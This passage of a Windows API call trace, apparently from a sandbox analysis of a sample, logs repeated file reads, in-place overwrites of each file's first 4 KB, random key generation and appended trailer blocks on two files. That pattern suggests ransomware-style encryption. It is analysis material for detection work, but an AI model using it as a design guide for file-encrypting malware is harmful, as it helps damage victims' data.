hFile=0x964, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.845] ReadFile (in: hFile=0x964, lpBuffer=0x84afd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x84afd4c*, lpNumberOfBytesRead=0x84afd08*=0x0, lpOverlapped=0x0) returned 1 [0083.845] SetFilePointerEx (in: hFile=0x964, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.845] GetProcessHeap () returned 0x4f10000 [0083.845] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0083.845] GetProcessHeap () returned 0x4f10000 [0083.845] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0083.845] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0083.845] GetProcessHeap () returned 0x4f10000 [0083.845] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b610d8 [0083.845] ReadFile (in: hFile=0x964, lpBuffer=0x8b610d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesRead=0x84afd08*=0x1000, lpOverlapped=0x0) returned 1 [0083.893] SetFilePointerEx (in: hFile=0x964, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.893] WriteFile (in: hFile=0x964, lpBuffer=0x8b610d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesWritten=0x84afd44*=0x1000, lpOverlapped=0x0) returned 1 [0083.893] GetProcessHeap () returned 0x4f10000 [0083.893] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0083.893] GetProcessHeap () returned 0x4f10000 [0083.893] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.893] GetProcessHeap () returned 0x4f10000 [0083.893] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0083.893] GetProcessHeap () returned 0x4f10000 [0083.893] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.893] GetProcessHeap () returned 0x4f10000 [0083.894] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0083.894] GetProcessHeap () returned 0x4f10000 [0083.894] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.894] GetProcessHeap () returned 0x4f10000 [0083.894] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.894] GetProcessHeap () returned 0x4f10000 [0083.894] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.894] GetProcessHeap () returned 0x4f10000 [0083.894] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.894] GetProcessHeap () returned 0x4f10000 [0083.894] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.894] GetProcessHeap () returned 0x4f10000 [0083.894] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.894] GetProcessHeap () returned 0x4f10000 [0083.894] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.894] GetProcessHeap () returned 0x4f10000 [0083.894] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.894] GetProcessHeap () returned 0x4f10000 [0083.894] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.894] GetProcessHeap () returned 0x4f10000 [0083.894] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.894] GetProcessHeap () returned 0x4f10000 [0083.894] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.894] GetProcessHeap () returned 0x4f10000 [0083.894] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.894] GetProcessHeap () returned 0x4f10000 [0083.894] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.894] GetProcessHeap () returned 0x4f10000 [0083.894] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.894] GetProcessHeap () returned 0x4f10000 [0083.894] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.894] GetProcessHeap () returned 0x4f10000 [0083.894] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.894] GetProcessHeap () returned 0x4f10000 [0083.894] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.894] GetProcessHeap () returned 0x4f10000 [0083.894] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.894] GetProcessHeap () returned 0x4f10000 [0083.894] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.894] GetProcessHeap () returned 0x4f10000 [0083.895] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.895] GetProcessHeap () returned 0x4f10000 [0083.895] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.895] GetProcessHeap () returned 0x4f10000 [0083.895] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.895] GetProcessHeap () returned 0x4f10000 [0083.895] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.895] GetProcessHeap () returned 0x4f10000 [0083.895] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.895] GetProcessHeap () returned 0x4f10000 [0083.895] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.895] GetProcessHeap () returned 0x4f10000 [0083.895] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.895] GetProcessHeap () returned 0x4f10000 [0083.895] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.895] GetProcessHeap () returned 0x4f10000 [0083.895] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.895] GetProcessHeap () returned 0x4f10000 [0083.895] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.895] GetProcessHeap () returned 0x4f10000 [0083.895] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.895] GetProcessHeap () returned 0x4f10000 [0083.895] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.895] GetProcessHeap () returned 0x4f10000 [0083.895] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.895] GetProcessHeap () returned 0x4f10000 [0083.895] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.895] GetProcessHeap () returned 0x4f10000 [0083.895] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0083.895] GetProcessHeap () returned 0x4f10000 [0083.895] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.895] GetProcessHeap () returned 0x4f10000 [0083.895] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0083.895] GetProcessHeap () returned 0x4f10000 [0083.895] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0083.895] GetProcessHeap () returned 0x4f10000 [0083.895] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0083.895] GetProcessHeap () returned 0x4f10000 [0083.895] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0083.895] GetProcessHeap () returned 0x4f10000 [0083.896] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0083.896] GetProcessHeap () returned 0x4f10000 [0083.896] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0083.896] GetProcessHeap () returned 0x4f10000 [0083.896] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.896] GetProcessHeap () returned 0x4f10000 [0083.896] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0083.896] GetProcessHeap () returned 0x4f10000 [0083.896] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.896] GetProcessHeap () returned 0x4f10000 [0083.896] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.896] GetProcessHeap () returned 0x4f10000 [0083.896] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.896] GetProcessHeap () returned 0x4f10000 [0083.896] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.896] GetProcessHeap () returned 0x4f10000 [0083.896] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.896] GetProcessHeap () returned 0x4f10000 [0083.896] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.896] GetProcessHeap () returned 0x4f10000 [0083.896] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.896] GetProcessHeap () returned 0x4f10000 [0083.896] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.896] GetProcessHeap () returned 0x4f10000 [0083.896] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.896] GetProcessHeap () returned 0x4f10000 [0083.896] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.896] GetProcessHeap () returned 0x4f10000 [0083.896] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.896] GetProcessHeap () returned 0x4f10000 [0083.896] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.897] GetProcessHeap () returned 0x4f10000 [0083.897] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.897] GetProcessHeap () returned 0x4f10000 [0083.897] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.897] GetProcessHeap () returned 0x4f10000 [0083.897] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.897] GetProcessHeap () returned 0x4f10000 [0083.897] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.897] GetProcessHeap () returned 0x4f10000 [0083.897] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.897] GetProcessHeap () returned 0x4f10000 [0083.897] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.897] GetProcessHeap () returned 0x4f10000 [0083.897] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.897] GetProcessHeap () returned 0x4f10000 [0083.897] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.897] GetProcessHeap () returned 0x4f10000 [0083.897] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.897] GetProcessHeap () returned 0x4f10000 [0083.897] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.897] GetProcessHeap () returned 0x4f10000 [0083.897] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.897] GetProcessHeap () returned 0x4f10000 [0083.897] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.897] GetProcessHeap () returned 0x4f10000 [0083.897] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0083.897] GetProcessHeap () returned 0x4f10000 [0083.897] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.897] GetProcessHeap () returned 0x4f10000 [0083.898] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0083.898] GetProcessHeap () returned 0x4f10000 [0083.898] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0083.898] GetProcessHeap () returned 0x4f10000 [0083.898] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0083.898] GetProcessHeap () returned 0x4f10000 [0083.898] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0083.898] SetFilePointerEx (in: hFile=0x964, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.898] WriteFile (in: hFile=0x964, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x84afd44*=0x100, lpOverlapped=0x0) returned 1 [0083.898] WriteFile (in: hFile=0x964, lpBuffer=0x84afd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x84afd48*, lpNumberOfBytesWritten=0x84afd44*=0x4, lpOverlapped=0x0) returned 1 [0083.898] GetProcessHeap () returned 0x4f10000 [0083.898] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b610d8 | out: hHeap=0x4f10000) returned 1 [0083.898] GetProcessHeap () returned 0x4f10000 [0083.898] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0083.898] GetProcessHeap () returned 0x4f10000 [0083.898] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0083.898] CloseHandle (hObject=0x964) returned 1 [0083.900] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 121 [0083.900] SetFilePointerEx (in: hFile=0x968, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.900] ReadFile (in: hFile=0x968, lpBuffer=0x84afd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x84afd4c*, lpNumberOfBytesRead=0x84afd08*=0x0, lpOverlapped=0x0) returned 1 [0083.900] SetFilePointerEx (in: hFile=0x968, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.900] GetProcessHeap () returned 0x4f10000 [0083.900] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0083.900] GetProcessHeap () returned 0x4f10000 [0083.900] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0083.900] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0083.900] GetProcessHeap () returned 0x4f10000 [0083.900] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b610d8 [0083.900] ReadFile (in: hFile=0x968, lpBuffer=0x8b610d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesRead=0x84afd08*=0x1000, lpOverlapped=0x0) returned 1 [0083.948] SetFilePointerEx (in: hFile=0x968, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.948] WriteFile (in: hFile=0x968, lpBuffer=0x8b610d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesWritten=0x84afd44*=0x1000, lpOverlapped=0x0) returned 1 [0083.948] GetProcessHeap () returned 0x4f10000 [0083.948] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0083.948] GetProcessHeap () returned 0x4f10000 [0083.948] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.948] GetProcessHeap () returned 0x4f10000 [0083.948] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0083.948] GetProcessHeap () returned 0x4f10000 [0083.948] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.948] GetProcessHeap () returned 0x4f10000 [0083.948] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0083.948] GetProcessHeap () returned 0x4f10000 [0083.948] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.948] GetProcessHeap () returned 0x4f10000 [0083.948] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.948] GetProcessHeap () returned 0x4f10000 [0083.948] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.948] GetProcessHeap () returned 0x4f10000 [0083.948] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.948] GetProcessHeap () returned 0x4f10000 [0083.948] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.948] GetProcessHeap () returned 0x4f10000 [0083.948] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.948] GetProcessHeap () returned 0x4f10000 [0083.948] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.948] GetProcessHeap () returned 0x4f10000 [0083.949] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.949] GetProcessHeap () returned 0x4f10000 [0083.949] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.949] GetProcessHeap () returned 0x4f10000 [0083.949] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.949] GetProcessHeap () returned 0x4f10000 [0083.949] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.949] GetProcessHeap () returned 0x4f10000 [0083.949] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.949] GetProcessHeap () returned 0x4f10000 [0083.949] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.949] GetProcessHeap () returned 0x4f10000 [0083.949] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.949] GetProcessHeap () returned 0x4f10000 [0083.949] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.949] GetProcessHeap () returned 0x4f10000 [0083.949] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.949] GetProcessHeap () returned 0x4f10000 [0083.949] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.949] GetProcessHeap () returned 0x4f10000 [0083.949] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.949] GetProcessHeap () returned 0x4f10000 [0083.949] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.949] GetProcessHeap () returned 0x4f10000 [0083.949] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.949] GetProcessHeap () returned 0x4f10000 [0083.949] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.949] GetProcessHeap () returned 0x4f10000 [0083.949] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.949] GetProcessHeap () returned 0x4f10000 [0083.949] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.949] GetProcessHeap () returned 0x4f10000 [0083.949] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.949] GetProcessHeap () returned 0x4f10000 [0083.949] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.949] GetProcessHeap () returned 0x4f10000 [0083.949] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.949] GetProcessHeap () returned 0x4f10000 [0083.949] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.949] GetProcessHeap () returned 0x4f10000 [0083.950] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.950] GetProcessHeap () returned 0x4f10000 [0083.950] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.950] GetProcessHeap () returned 0x4f10000 [0083.950] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.950] GetProcessHeap () returned 0x4f10000 [0083.950] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.950] GetProcessHeap () returned 0x4f10000 [0083.950] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.950] GetProcessHeap () returned 0x4f10000 [0083.950] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.950] GetProcessHeap () returned 0x4f10000 [0083.950] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0083.950] GetProcessHeap () returned 0x4f10000 [0083.950] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.950] GetProcessHeap () returned 0x4f10000 [0083.950] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0083.950] GetProcessHeap () returned 0x4f10000 [0083.950] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0083.950] GetProcessHeap () returned 0x4f10000 [0083.950] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0083.950] GetProcessHeap () returned 0x4f10000 [0083.950] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0083.950] GetProcessHeap () returned 0x4f10000 [0083.950] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0083.950] GetProcessHeap () returned 0x4f10000 [0083.950] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0083.950] GetProcessHeap () returned 0x4f10000 [0083.950] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x1f8) returned 0x7cf6bf8 [0083.950] GetProcessHeap () returned 0x4f10000 [0083.950] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0083.950] GetProcessHeap () returned 0x4f10000 [0083.950] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.950] GetProcessHeap () returned 0x4f10000 [0083.950] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0083.950] GetProcessHeap () returned 0x4f10000 [0083.951] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.951] GetProcessHeap () returned 0x4f10000 [0083.951] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.951] GetProcessHeap () returned 0x4f10000 [0083.951] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.951] GetProcessHeap () returned 0x4f10000 [0083.951] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.951] GetProcessHeap () returned 0x4f10000 [0083.951] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.951] GetProcessHeap () returned 0x4f10000 [0083.951] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.951] GetProcessHeap () returned 0x4f10000 [0083.951] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.951] GetProcessHeap () returned 0x4f10000 [0083.951] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.951] GetProcessHeap () returned 0x4f10000 [0083.951] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.951] GetProcessHeap () returned 0x4f10000 [0083.951] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.951] GetProcessHeap () returned 0x4f10000 [0083.951] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.951] GetProcessHeap () returned 0x4f10000 [0083.951] HeapFree (in: 